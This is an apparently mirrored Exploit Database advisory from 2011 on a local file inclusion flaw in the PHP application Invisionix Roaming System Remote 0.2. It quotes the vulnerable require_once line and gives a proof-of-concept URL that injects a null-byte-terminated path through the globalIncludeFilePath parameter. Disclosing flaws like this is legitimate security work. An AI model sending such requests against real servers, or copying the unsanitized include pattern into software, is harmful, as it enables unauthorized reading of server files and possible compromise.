Invisionix Roaming System Remote metasys 0.2 – Local File Inclusion

• Exploit Database
• 11 阅读

• 作者： Treasure Priyamal
  日期： 2011-05-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17344/

• nvisionix Roaming System Remote metasys 0.2 LFI Vulnerability
  
   
  Site ................... :	http://sourceforge.net/projects/irsr/
  Download ............... :	http://space.dl.sourceforge.net/project/irsr/irsr/irsr-0.2/irsr-0.2.ZIP 
  Author ................. :	Treasure Priyamal
  Contact ................ :	treasure[at]treasuresec.com
  
  Note : Successful exploitation requires that "register_globals" is enabled. 	
   
  ========================================================================
   
  Description:
   
  Your own portable PC system built by integrating existing Open Source components.
   This mobile metasystem utilizes the internet's web hosting resources and is accessed 
   via any web browser enabled appliance from your home, work, school, library, cafes, etc
   
  ========================================================================
   
  *************************************************
  [!]This other sample vuln c0de which affected to LFI [!]
  *************************************************
  
  There is a vulnerability in almost every file directory , for example in this Directory file:
  
  [-] system/default.php
  
  require_once ($globalIncludeFilePath);			// System's global include file.
  
  -=[ P0C LFI ]=-
  
  http://localhost/irsr/authenticate/sessions.php?globalIncludeFilePath=[LFI]%00
  ========================================================================